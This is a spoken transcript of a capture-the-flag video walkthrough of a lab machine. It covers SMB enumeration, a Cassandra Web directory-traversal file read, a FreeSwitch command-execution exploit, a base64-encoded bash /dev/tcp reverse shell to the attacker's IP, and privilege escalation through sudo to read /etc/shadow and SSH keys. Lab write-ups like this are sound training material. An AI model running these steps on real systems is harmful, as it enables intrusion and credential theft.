Let's go ahead and start off with a network scan. So let's do sudo nmap tacsc for default scripts, tacsv to enumerate the versions, tacvv to get some verbose output, and tacon to output to a file, call it initial with this IP address, and then we can go ahead and send that through. Although I already did run this because it did take a little bit of time, so we can go ahead and see what we have here. So we do have a couple of ports open, 1, 2, 3, 4, and 5. We do have 22, which is SSH, and the banner is telling us that this is a Debian server, and this is the version of Debian it's running. This is Debian 10, and the second update of Debian 10. So that's useful just in case that you need to run a OS scan, or if in the case that you need to design an exploit specifically for this version of the kernel or for this version of Linux. So if we go down a little bit, we can see that we have port 80, which is HTTP, and the banner is telling us that this is an Apache server, although it is saying that it is 403 forbidden. It's forbidden from us to access it. We can also see that right here we have 139, which is NetBIOS. It's running Samba, and 445, which is SMB, also running Samba. I believe Samba is how Linux runs SMB, or the SMB daemon. It's like a background process for this specific service. And then we have 3000 here, which is also HTTP, and it's saying that this is Cassandra Web running thin HTTPD. I'm assuming that this is still Apache. If we go here and we do what is Cassandra Web Linux, an open source NoSQL distributed database, and it is Apache. So that gives us a little more information on that. If we scroll down here a little bit more, we can see the SMB security script run, and we have guest authentication to the share. So let's go ahead and start off by taking a look at what shares are available on the SMB server. So let's do SMB client tac L, and then we'll do a / and the IP address, send that through, and we could see that we have this backup share here, and the comment is backup web directory shares. So let's do something. Let's do nxc SMB with the IP address and no username or password, and let's go ahead and add the flags of shares so we can see if we actually have access to this share. We can see that we get authenticated, and we do have read access to this share. This can also be done with SMB map, I believe, although my SMB map is messed up for some reason. Let's see if this works. Let's do a username of nothing. Yeah, no. So my SMB map is messed up. I do have to reinstall this and see if I can go ahead and fix that. Although we do have read access to the backup share. Now, one thing that we can do, right, one way to enumerate this, and sort of my favorite way, is to actually mount the share onto a folder here, right? So let's do mkdir, or let's make a directory called mount, and then let's do sudo mount -t, and then we can do CIFS for the SMB thing. And then we can do -o for the authentication. We could do username equals nothing and password equals nothing. And then we can close that off, and we can do the / specifying the actual share right here, backups or backup. And then we can do mount, which is the directory that we want to mount this file to. Let's go ahead and click enter, put in the password, and lsla on mount. We can see that we have Cassandra and FreeSwitch. Cool. So let's go into mount. There you go. It's ls, and let's go into Cassandra. Since we do know that we have Cassandra on there, we didn't see this FreeSwitch in there. Although one thing that we can do before we go any further is let's do sudo nmap tacp tac, and then we can do a tacsc tacsv, and then min rate of 10,000 to go ahead and do this a little bit faster, and also get the version and the default scripts be sent with all the ports being scanned. So we can see if this is actually running on the server or if it's something else, right? So let's go ahead and make that a little bit cleaner. There we go. So now we're in the Cassandra directory here. We have this etc user and var, and this looks like an installation of Cassandra. We can go into etc. We can go into Cassandra. And we have this cassandra.yaml file, and this is the configuration file, I believe. We can also go to Firefox and we can do Cassandra Web config file, cassandra.yaml. Oh, I'm not sure if you guys can see that. Apologies. Let me see. Let's do that again. Let's zoom in a little bit more. And we can see right here, cassandra.yaml. Cool. So this is the config file. We can do less cassandra.yaml. And then we can search for password. Let's do password. And for next, we could see here that all the passwords are Cassandra, Cassandra, Cassandra down here. Even more of the same password. And if I'm not mistaken, Cassandra Web default credentials, we can see that the username is Cassandra and the password is Cassandra. So this might be a default installation of Cassandra that was backed up just in case, right? So if this is default, I'm assuming that the other one is default as well, or the FreeSwitch one is default as well. We can do a FreeSwitch default credentials like this. We can see that it's 1, 2, 3, 4. So if we go into FreeSwitch, what's in here? etc. Let's do etc. What's in here? FreeSwitch, and let's go autoload configs. There's a, oops. There we go. Now in here, there is, I believe, yeah, there's a bunch of files in here. So what we can do is we can grep-ri and then password. Let's see. Okay, so we have this cluecon password here. And that is in this kazoo, was it? No, this hash.conf. We have a couple other things here. This eventsocket.conf.xml also has cluecon. Let's scroll up a little bit. Let me see. Let's see if... Okay, so this is also the default password is cluecon. Okay, so that's interesting. This is also saying that the event socket or the mod event socket TCP based interface. Okay. So I'm assuming that's what this file was. If we scroll down a little bit, this eventsocket.conf.xml, and then this is giving the password. Let's do less on event socket. Yeah, so we can see right here it's saying 127.0.0.1, and we have whatever listening port, but the value of 8021, which is the port, and the password of cluecon. So this might be interesting to note down in the case that we ever have access to these files within the web server itself. So now that we know that these are just default installations of these services, right? We can go ahead and move on to actually enumerating the web applications, right? Or the web services. So let's do HTTP, and it's running super slow. There we go. And it was on port 3000. So here we have Cassandra Web. We have this execute button here, and we also have the version number right here, which is interesting. So this is good to note down. The first thing I'm going to do, right, is let's go ahead and do Cassandra Web hack tricks. And there is this pen testing Cassandra Web. Or is it this one, or is it the other one? Yeah, it's this one. Okay, so within Cassandra Web is a NoSQL database, like we were mentioning before, and it has these different key spaces. And when I see key spaces, it kind of reminds me of like Redis with all the key spaces down there, or the keys that are tied to different directories. Although I'm not sure why, like it's not really like related. They're not really related. Although, anyways, nonetheless, we can do a couple of manual enumerations on here since we can actually execute NoSQL or CSQL. I think this is Cassandra query language. We can try and execute some of these commands. Let's do this, execute. We don't get anything there. Let's see. Let's see the user. We can see what user we're running as. I guess not. So I don't think that this is allowing us to actually execute any commands in here. Let's see this one. Let's try this config one. Nope, does not exist. Let's try one of these. Create. Let's try the system auth one. So no, this doesn't seem to be working, although we do see something interesting here. We have user Cassie has no create permission. So we do know the user now that we're working as is Cassie. That's pretty interesting. So although this doesn't work, we do have the version. So we can go ahead and do Cassandra 3.11.13 exploit. And we see this Cassandra Web 050 remote file read. So if we click on this, we can scroll down a little bit. And if we read through this, this is simply just a ... attack on the root of the web application or of the root of the web server. And you can see that with, where is it, right here, this slash. So we're just doing the target and then the slash, or the target is the IP address and the port, and then the slash is the root of the file system, and then just immediately putting in the payload right after that. And the payload, if I can find it, let's see. See where it, oh, right here, this DT, which is the ... slash, this is 8 ... slashes, and then the payload is the actual file that they want to read. I'll zoom in a little bit here. This is this DT, the number of DTs, and then the file that we want to read right here. So this is very simple. All we have to do is go back here. Let's go to burp, turn intercept on. Let's go over here to Foxy Proxy, turn intercept or turn burp on. And let's refresh the page, get it over here. Let's send this to repeater with Control R and Control Shift R to go to repeater. And then in this like request, we can go ahead and do a get request on ... slash 8 times. Not sure if that's actually 8, but we'll figure it out. And then we can see if we can get etc past WD. And right here, we do have a remote file read vulnerability that allows us to read files on the file system. Awesome. So what we do have here, what we do get from this enumeration is we do have a couple of users. We have Anthony here, and we have Cassie here, and we also have a Cassandra and FreeSwitch sort of system users, right? Or system like service users, sorry. So one thing that we can do here is we can actually enumerate the processes. But one thing that we're going to do first is we can do, if we didn't find out that the user that we were running as was Cassie right from the beginning, right? One thing that we can do is list out the environment variables. So we could do proc self environ like this, send. We get the environment variables here, and we can see that the user is Cassie right here. So that's pretty easy to, an easy way to identify which user you're running as. We could have also done this with like www.data if that happened to be the case that we were running as them. Also, something that we could try and do is see if Cassie has any SSH files in her home file or home directory, right? So let's do home Cassie and then .ssh id ID RSA, send. So this 200 OK message just takes us to this blank Cassandra web page, which means that this file doesn't exist. So if we did the same thing, right? Proc self environ. Let's do this for example. We get this back. Now if we did enviro, which doesn't exist, we get this 200. So that's just one way to enumerate that. We don't have an IDRSA file or an SSH file within the Cassie directory or in her home directory. Although another thing that we can do is we can see if we can see any passwords or we can find any credentials within the cassandra.yaml file, right? So let's go back and see where it was located. So if we go into mount, Cassandra like this, and we did lsla, we have etc. Let's do tree dot. Okay, perfect. This is going to be long. So let's go up a little bit. So we have etc Cassandra, and then the Cassandra.yaml is right here. So that's what we have to send. etc Cassandra, and then Cassandra.yaml, like this, send it. We get the file back, and we can search for password. We can scroll down a little bit. Wow, really far deep in this file. And so here we go. We don't have any actual like new passwords. This seems to be like just a default configuration of Cassandra. There's no password stored in this YAML file. Although if we went ahead and checked the actual process that's running, so we could do proc self and then cmd line, this shows us the actual process that is running this instance right here. And this is it right here. We have this user bin Ruby 2.5, this Cassandra Web, and then the arguments of TAC-U with Cassie and TAC-P for the password with second byte the apple 330. So this is Cassie's password. So what we can do is let's go cd into creds. No, not in here. Let's do cd creds. There we go. bi creds. And we could do Cassie with this password. Awesome. Let's just go ahead and put Anthony in here too, in case we ever find his password. Let's do that. And so let's try an SSH in as Cassie. So let's do SSH Cassie at 192.168.194 and then 240. Let's paste this in. And we get this permission denied error. So we can't actually log in with Cassie's password. We can't actually log into SSH as Cassie at all. So the next thing that we would go ahead and try and do is identify that FreeSwitch service, right? So what we can do is we can do FreeSwitch exploit. See if anything comes back for this. Okay, we have this FreeSwitch 110.1 command execution. We can go ahead and click on this. We can scroll down a little bit. And we can see that it's just communicating through socket with the FreeSwitch server. So right here, it's going ahead and setting the default password for FreeSwitch, which is cluecon. And if we remember back to when we were first enumerating the cluecon, or I mean the FreeSwitch directory that we got through the backups server, or backups, what was it? The backups share, sorry. We saw that event socket file. So keep that in mind. All this is doing here is communicating and authenticating with this password to the FreeSwitch server and running API system and then the CMD or the command that we want to run within this right here. So that is pretty simple. We can go ahead and copy this, view raw, copy this. Let's do vi, or let's go back, and then vi exploit.py, set paste, and paste that in, save it, and chmod plus x on exploit.py. So let's do Python 3 exploit.py, and we need the target and the command, or the ID that we want to run. So we can go ahead and put 192.168.4, is it 194 and 240, which is the IP address, and we want to run ID, and we get this authentication failure. So the next thing that I'm thinking about doing is utilizing this file read vulnerability to see if we can find the password to that FreeSwitch service. So the first thing that I'm going to do is check that event socket file, considering there was 2 files, I believe, that had that present. Now let's go ahead and we can go back up a little bit and view this. Here we go. We have this event socket conf.xml, and we have the hash.conf.xml. So let's go ahead and take a look at those. Now I want to do something. Let's go ahead and go back in here, FreeSwitch, etc, FreeSwitch, and then auto load configs. Here you go. And we can grep-ri for clue con. Okay, we have this one, this one. Let's see if it gets the last one. Oh, wow, there's more than just that. Okay, there we go. So we have these 3. Now, the next thing I'm going to do is let's do that, and then let's go ahead and let's grab the first field like this. It's going to grab this one, correct? Just want to see it happen. I guess not. That's weird. Let's do a F on this. Maybe that'll work. I guess not. Okay, that's fine. No problem. Let's just go ahead and take a look at what we have here. We have these 3, or these 4 actually. And what I'm going to do is just going to script this out real quick. So what we can do from here, let's go ahead and look at this. Here we go. Let's do let's go back. All right, let's do vi temp, and then let's put these files in here. Copy, paste, copy this one, paste. There's only 4 of them, so it's fine. And this one right here. Copy, paste, cool. We can save this, and what we can do from here is we can do curl -s-q, and then path as is, and then we could do http:// the IP address 3000. We can do a bunch of // etc FreeSwitch auto load configs, and from here we have that set out, so we could do for I in and then $cat temp like this. Let's go to the end, $I for each file, and then in here, actually I'm going to go ahead and do this in quotes. We're going to append it to a file called carve. And then from here, we could just go ahead and do done. Like this. That was pretty fast. Let's see if it actually worked. Cat carve. Yes, it did. So let's do something now here. Let's cat carve and then grep password. All right, we have this password of Clucon, and we have a password here with the value of strong Clucon 8021. Cool. Awesome. So let's go ahead and edit this exploit. Let's go right here. Paste this in. Right, and quit. And then we could do Python 3 exploit.py. Let's do... There we go. And there we have it. We do have remote code execution right here with the API response, and we just executed the ID command. Cool. So the next thing that we can do from here is we can try and get a reverse shell out of this. Let's close this, and let's do ncat tech nblp 9999. Let's do... Actually, I think what I'm going to do is I'm going to base64 encode it and then have it sent out like that. So let's do echo-n and then bash. Let's do bash tech I to and then we can do /dev tcp 192.168.45.222, I believe. Yeah, there we go. 9999 and then 0, 2, and 1 like that. It's going to send it. Cool. And then we could do base 64 tag W0. Let's go ahead and add some spaces in here to get rid of all of those spaces in the code. All right, we need one more. There we have it. All these are alphabetic letters. Cool. Now what we can do from here is we can do a echo this. Let's keep this in quotes like that. And then base 64 tech D bash like that. And cat nvlp 9999. Let's see if this works. Okay, it doesn't seem to work. Maybe there's some type of firewall in place. So let's go ahead and change the port that we want to, let's do 80. There we go. Ooh, there is a plus here. Now forget it. I'm just going to see if this works like this. Hopefully it does. Let's do 80 and sudo. Like that. And let's change this base64 right here to this one. And there we go. We have a shell. Awesome. So let's do a which Python 3. Let's go ahead and stabilize the shell. Can we close this? Yes, we can. Which Python 3. Okay, awesome. Python 3, text C, import pty, pty.spawn, and bin bash, like that. Control Z to background it, and then stty raw minus echo colon fg or semicolon, and then click enter twice, and then we could do export term equals xterm. Fantastic. We can clear the screen and we are good to go. Now we are the FreeSwitch user. Although let's go ahead and see if we can upgrade our privileges to Cassie, considering we do have her password. So let's do cat creds. We have that one there, su Cassie. We have this. Paste it, and we are in as Cassie. Let's go cd home, cd Cassie. Oh, so we did have an IDRSA file. It just wasn't in a .ssh directory. cd.ssh. known hosts. Okay, odd, weird. Whose is this? Let's see. If we go into the .ssh directory, cat known hosts, what is this? That is a lot of stuff. Let's go back and let's go ahead and cat IDRSA. Let's grab this, copy, and let's do this. VI ID RSA, set paste that in. chmod 600 on IDRSA and SSH IDRSA cassie at 192.168.194.204. Is this going to work? Sort of hanging. Oh, we can't SSH as Cassie. So then whose is this? Let's try Anthony. Does this work? No, it doesn't seem to work. Okay, that's weird. Let's go ahead and see what Cassie can run. Okay, so Cassie can run Cassandra Web with no password as root. Now, one thing that we can do is we can do sudo user local bin Cassandra Web, and we can see the options. So what we're going to want to do is start up this server on a different port with the same user and password, although we are running, since we're running it with sudo, we are going to run this program as root. So what we can do from there is utilize that file read vulnerability to read files as root. So let's do a B and then 0000 with, let's say, port 7777, for example. And then we can do U cassie P second byte the apple 330. Let's control C that real quick and let's background it with the and so we can still use our terminal. There we go. And what we can do from here is let's do curl path as is like that. And we can do http://localhost 7777 / Etsy shadow to test. And here we have the shadow file. So we are running this vulnerability as root. We can see Cassie's password. We can see Anthony's password. We can try and crack root's password, although that's not really going to work or help. Although we can see if Anthony has a .ssh file or an IDRSA file, so we can go ahead and laterally move to him. So let's do a home Anthony .ssh and then ID RSA, and here we have one. Awesome. So we can grab this. Let's VI ID RSA. Let's remove this one. Remove the whole thing, everything. Take it all out. Cool. Set paste that in, save it. chmod 600 IDRSA and SSH Anthony at 192.168.194.240. Oh, ID RSA. It's asking for Anthony's password, so I'm assuming that this is not Anthony's ID RSA. Let's try Cassie. Nope. What about root? And we get in as root. So that was actually root's SSH key. And now something odd, something weird that we can go ahead and take a look at is if you go to, well, we can just go to root and then see the proof and proof you tried harder. We can cat proof and text, and it says the proof is in another file, which is this one right here. And you can go from there. Now, one more thing I wanted to show was something a little bit funny, a little bit weird. If we go to Cassie, home Cassie, we can see that we have the IDRSA here, right? And then if we do LSLA, home Anthony, there you go, .sh, IDRSA, we have this one as well. So these two are actually the same thing. So if we do the diff command, which shows us the differences between two files, and we do IDRSA here, and then we do home Anthony IDRSA like this, and we paste it in there, there we go. We can see that no differences come out, right? So we did VI IDRSA here, and I added a, let's say, something like this, and we did this again, we can see that all of these are the things that I just added in this IDRSA file. So that means that if you just tried the IDRSA as roots, or I mean, tried to log in as root with this IDRSA within the Cassie home directory, you would have saved yourself a bunch of time with working with that Cassandra Web binary and trying to figure that out if that was the case. So it was just a funny little thing that I thought was pretty cool and like weird, and like, why would you do that? But whatever, no problem, no big deal. It works for us, you know. Although that is the video, that is Clue. I hope you guys enjoyed. I hope you guys learned something or just found it a little bit interesting, whatever it was. And I will see you guys in the next one.